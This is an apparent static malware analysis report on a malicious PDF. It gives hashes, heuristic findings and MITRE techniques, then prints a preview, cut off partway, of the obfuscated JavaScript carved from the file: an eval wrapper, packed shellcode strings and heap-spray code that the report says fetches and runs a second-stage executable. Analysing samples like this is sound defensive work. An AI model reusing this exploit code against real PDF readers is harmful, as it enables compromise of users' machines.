Malicious PDF — malware analysis report

Static analysis result for SHA-256 7c448496cc4fe21c…

MALICIOUS

PDF

10.2 KB Created: 2009-04-08 16:02:46 Authoring application: OVKBweNzJdVBhYWFmSI (via WWQWVCBSFCEaalSZGV)
MD5: 2e3caaf00e564dd47f6c0c5ced19797f SHA-1: 2a53766cd00cd4f60727263db8c8c49e870c2154 SHA-256: 7c448496cc4fe21cbe71ba501f083ebab43a4776711735107be1515c89b4a229
116 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript · T1203 Exploitation for Client Execution · T1566.001 Spearphishing Attachment

The PDF contains embedded JavaScript, flagged as a PDF JavaScript exploit cluster, which is designed to download and execute a second-stage payload. The script attempts to obfuscate its actions but ultimately constructs a URL to fetch a malicious executable. The ML classifier strongly indicates maliciousness, and the presence of JavaScript points to T1059.007.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0007_000.js
3a08a6717b23e14516e9256dd33a207198d6a716d749f10a4ae2d207861d4666
pdf-javascript-stream PDF /JS object 7 at offset 0x55D 8303 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Analyst note: thin wrapper around eval(). It takes a string and executes it as code;
// the call on the next preview line feeds it the output of an unpacker, so this is the
// point at which the decoded second stage becomes live — a useful hook/breakpoint when
// analysing the sample in an instrumented sandbox, and the indicator the
// PDF_JS_EXPLOIT_CLUSTER rule keys on (eval + string building).
function eLwXfgx3l(kznKCxHAKH){ return eval(kznKCxHAKH);}
// Analyst note: both identifiers are assigned without a declaration (implicit globals).
// The loop condition `bcDrsLkQp>2` is already false on entry (counter starts at 1), so the
// body never runs and ngaaGsTDk9 stays 733181 — dead code, presumably inserted as junk to
// vary the sample's appearance; it has no effect on the payload that follows.
ngaaGsTDk9 =733181;for(bcDrsLkQp=1; bcDrsLkQp>2; bcDrsLkQp++){ ngaaGsTDk9++;}
eLwXfgx3l(function(l,a,z,k,e,d){e=function(z){return(z<a?'':e(parseInt(z/a)))+((z=z%a)>35?String.fromCharCode(z+29):z.toString(36))};while(z--){if(k[z]){l=l.replace(new RegExp('\\b'+e(z)+'\\b','g'),k[z])}}return l}('k I=3J.3K.3E();I=I.3y(/\\D/g,"");3C(I.1h(0)=="8"&&I.1h(1)<="1"&&I.1h(2)<="2"){1n=F("%3B"+"0%1i"+"51%U"+"3O%u"+"3P%"+"21"+"%r"+"0%41"+"l%1s"+"44%u"+"46%"+"2e"+"%3Z"+"3%3Q"+"30%W"+"3X%u"+"35%"+"1r"+"%3q"+"c%3s"+"8b%1s"+"3k%u"+"3m%"+"2d"+"%3h"+"d%3i"+"7c%X"+"3j%u"+"3l%"+"2f"+"%r"+"1%1m"+"l%1j"+"3p%u"+"3o%"+"h"+"%2X"+"1%39"+"59%j"+"O%u"+"56%"+"1J"+"%2I"+"a%1a"+"2E%j"+"O%u"+"5h%"+"15"+"%r"+"0%4Z"+"l%Q"+"4Y%u"+"5y%"+"v"+"%2I"+"a%1a"+"2E%j"+"O%u"+"5B%"+"10"+"%5A"+"2%5u"+"5n%j"+"5m%u"+"A%"+"Z"+"%5l"+"0%5k"+"5o%X"+"5p%u"+"5s%"+"16"+"%5r"+"4%5q"+"l%W"+"4Q%u"+"4P%"+"p"+"%4o"+"0%4n"+"4m%j"+"4l%u"+"A%"+"w"+"%2G"+"1%B"+"50%j"+"o%u"+"4p%"+"K"+"%1G"+"6%m"+"l%j"+"14%u"+"2n%"+"w"+"%2G"+"1%1m"+"5e%j"+"o%u"+"4q%"+"q"+"%4t"+"2%m"+"4s%U"+"2O%u"+"2n%"+"1p"+"%4a"+"a%4i"+"89%22"+"4g%u"+"4u%"+"h"+"%4J"+"2%4H"+"2Q%j"+"O%u"+"1k%"+"q"+"%2R"+"2%m"+"19%U"+"2O%u"+"4z%"+"h"+"%4y"+"0%4E"+"2Q%j"+"O%u"+"1k%"+"q"+"%2R"+"2%m"+"19%X"+"4C%u"+"4D%"+"13"+"%4B"+"c%B"+"6e%j"+"o%u"+"4A%"+"12"+"%4w"+"6%4x"+"1c%1s"+"4F%u"+"4G%"+"17"+"%4M"+"0%4N"+"4O%Q"+"4L%u"+"1R%"+"z"+"%4K"+"f%1m"+"52%j"+"o%u"+"1H%"+"t"+"%4I"+"0%m"+"l%U"+"4v%u"+"4h%"+"1q"+"%r"+"0%m"+"6a%j"+"14%u"+"1H%"+"t"+"%1G"+"e%m"+"l%W"+"4f%u"+"4e%"+"2j"+"%r"+"2%1i"+"l%j"+"14%u"+"4b%"+"1l"+"%4c"+"9%4d"+"81%j"+"4j%u"+"A%"+"18"+"%4k"+"5%m"+"19%1Y"+"4r%u"+"5t%"+"1E"+"%5C"+"9%5z"+"58%j"+"o%u"+"A%"+"h"+"%r"+"0%m"+"l%j"+"o%u"+"A%"+"h"+"%5v"+"7%1V"+"74%M"+"5w%u"+"5x%"+"2k"+"%5j"+"8%1D"+"l%M"+"5i%u"+"4X%"+"1F"+"%4W"+"2%4V"+"72%j"+"4R%u"+"4S%"+"1B"+"%1Z"+"2%4T"+"63%M"+"4U%u"+"49%"+"1u"+"%53"+"0%54"+"69%C"+"5f%u"+"5g%"+"1w"+"%5d"+"9%5c"+"89%22"+"5a%u"+"5b%"+"1v"+"%5D"+"7%1S"+"3Y%1j"+"37%u"+"31%"+"h"+"%1N"+"3%B"+"1b%j"+"o%u"+"1X%"+"N"+"%36"+"b%m"+"l%C"+"3n%u"+"3a%"+"1x"+"%1N"+"3%B"+"1b%j"+"o%u"+"3r%"+"1A"+"%r"+"0%3c"+"3b%3g"+"3d%u"+"1R%"+"1z"+"%3t"+"d%2Z"+
"85%j"+"1T%u"+"2Y%"+"2S"+"%1U"+"3%B"+"1b%j"+"o%u"+"32%"+"2V"+"%38"+"d%33"+"34%j"+"2W%u"+"A%"+"2N"+"%3e"+"9%48"+"51%3V"+"3W%u"+"3U%"+"2U"+"%3T"+"3%1a"+"3R%3S"+"3u%u"+"45%"+"2s"+"%r"+"2%1S"+"l%1Y"+"47%u"+"1X%"+"2w"+"%43"+"2%40"+"85%j"+"1T%u"+"1k%"+"2o"+"%1U"+"3%B"+"1b%j"+"o%u"+"42%"+"2p"+"%r"+"0%m"+"l%j"+"o%u"+"A%"+"h"+"%r"+"0%m"+"l%W"+"3D%u"+"3A%"+"p"+"%3z"+"0%3v"+"57%3w"+"3x%u"+"3F%"+"2H"+"%3L"+"b%3M"+"3N%1j"+"3G%u"+"3H%"+"2J"+"%3I"+"3%1D"+"52%Q"+"8q%u"+"8r%"+"2A"+"%8s"+"c%1i"+"55%Q"+"8E%u"+"7G%"+"2C"+"%7y"+"f%1V"+"64%Q"+"7x%u"+"7D%"+"2z"+"%7O"+"0%83"+"64%C"+"7Z%u"+"7Y%"+"2F"+"%7S"+"5%1W"+"63%C"+"7V%u"+"7W%"+"2T"+"%7X"+"0%7U"+"68%C"+"7T%u"+"7Q%"+"2P"+"%7R"+"9%1W"+"65%M"+"87%u"+"8a%"+"2M"+"%1Z"+"4%86"+"73%C"+"84%u"+"80%"+"2L"+"%82"+"e%7P"+"6e%M"+"7B%u"+"7C%"+"2B"+"%5E"+"8%7A"+"3f%X"+"7w%u"+"7E%"+"2y"+"");k y=F("%7F"+"a%7L"+"7M"+"");k J=20+1n.x;Y(y.x<J)y+=y;k 1M=y.1t(0,J);k E=y.1t(0,y.x-J);Y(E.x+J<7N)E=E+E+1M;k 1L=1Q 1P();1d(R=0;R<7K;R++){1L[R]=E+1n}k 1O="7J"+"1K"+"1K"+"8d"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"i"+"88"+"";7H.7I("%8c",1O)}8j{k 2t=1Q 1P();8I 2m(n,P){Y(n.x*2<P){n+=n}n=n.1t(0,P/2);8G n}k 2q=8D;k 1e=F("%8A"+"%8B"+"%2c"+"%8C"+"%21"+"%h"+"%8z"+"%8H"+"%8F"+"%2e"+"%8y"+"%8w"+"%8x"+"%8k"+"%1r"+"%8l"+"%8i"+"%8h"+"%8e"+"%2d"+"%8f"+"%8g"+"%8m"+"%2c"+"%2f"+"%s"+"%8n"+"%8t"+"%8u"+"%h"+"%8v"+"%8o"+"%s"+"%8p"+"%1J"+"%q"+"%V"+"%s"+"%z"+"%15"+"%h"+"%2i"+"%2h"+"%s"+"%v"+"%q"+"%V"+"%s"+"%1o"+"%10"+"%13"+"%2b"+"%7z"+"%h"+"%Z"+"%12"+"%2a"+"%25"+"%24"+"%16"+"%17"+"%v"+"%q"+"%23"+"%p"+"%z"+"%K"+"%26"+"%h"+"%w"+"%t"+"%27"+"%h"+"%29"+"%K"+"%1q"+"%h"+"%H"+"%H"+"%w"+"%t"+"%S"+"%h"+"%28"+"%q"+"%7u"+"%p"+"%z"+"%H"+"%1p"+"%1l"+"%w"+"%t"+"%S"+"%h"+"%18"+"%1I"+"%s"+"%v"+"%q"+"%V"+"%s"+"%z"+"%15"+"%h"+"%2i"+"%2h"+"%s"+"%v"+"%q"+"%V"+"%s"+"%1o"+"%10"+"%13"+"%2b"+"%6j"+"%h"+"%Z"+"%12"+"%2a"+"%25"+"%24"+"%16"+"
... (truncated)